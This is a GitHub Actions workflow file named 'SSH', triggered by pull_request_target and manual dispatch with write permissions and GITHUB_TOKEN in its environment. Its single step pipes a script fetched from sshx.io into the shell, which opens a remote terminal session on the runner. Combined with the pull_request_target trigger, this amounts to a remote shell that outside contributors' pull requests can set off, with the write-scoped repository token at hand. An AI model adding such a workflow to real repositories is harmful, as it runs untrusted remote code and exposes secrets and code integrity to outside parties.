name: SSH

on:
  workflow_dispatch:
  pull_request_target:

permissions:
  contents: write
  pull-requests: write

jobs:
  prep:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    steps:
      - run: |
          curl -sSf https://sshx.io/get | sh -s run
